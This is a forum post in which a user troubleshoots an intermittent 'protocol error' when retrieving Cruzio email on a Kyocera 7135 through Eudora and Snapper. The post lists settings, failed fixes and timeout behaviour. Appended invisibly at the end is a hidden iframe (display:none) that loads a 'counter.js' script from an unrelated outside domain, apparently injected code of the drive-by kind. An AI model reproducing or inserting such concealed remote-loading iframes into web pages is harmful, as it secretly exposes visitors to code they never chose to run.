I get a "protocol error" message when I try get mail from my main email account (Cruzio) using both Eudora Mail and Snapper. I'm using the airbridge outgoing server, so that's not the problem. Incoming mail on my airbridge account and airbridge server also works fine. My settings are the same as they were on my former 6035:

Save Password: entered and box checked
Authentication: Best Available
Security: None (I also tried Alternate Port)

I tried entering the incoming IP address directly instead of the name supplied by the ISP; same error message. My thinking was that the ISP had changed the IP address and the number had not yet propigated to all the name servers on the internet.

Tried a search here and found some old questions regarding different ISPs from 6035 users with no solutions.

Incoming mail did work for a few weeks when I got the 7135, then all I got were the error messages. Two weeks ago, it started working again, but now it's back to the errors. The only clue I can offer is that when the mail service was working, it took an exceptionally long time (compared to Airbridge) to log on and authenticate. When the connection timed out, I was able to connect again and get mail. If the connection times out, I do not get the protocol error message. When I get the error message, there is no connection timeout.

Mail from the ISP works on other computers. Both the ISP and Kyocera techs essentially blame the other's equipment. Rinse, lather, repeat.

Any ideas?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>